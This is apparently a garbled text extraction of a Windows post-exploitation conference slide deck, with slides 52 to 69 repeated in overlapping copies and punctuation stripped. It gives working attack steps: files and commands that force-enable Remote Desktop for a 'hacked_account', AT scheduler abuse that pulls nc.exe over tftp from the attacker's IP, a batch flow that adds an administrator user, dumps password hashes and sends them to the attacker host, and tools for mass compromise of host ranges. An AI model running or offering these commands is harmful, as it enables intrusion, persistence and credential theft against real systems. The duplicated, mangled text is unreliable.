[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet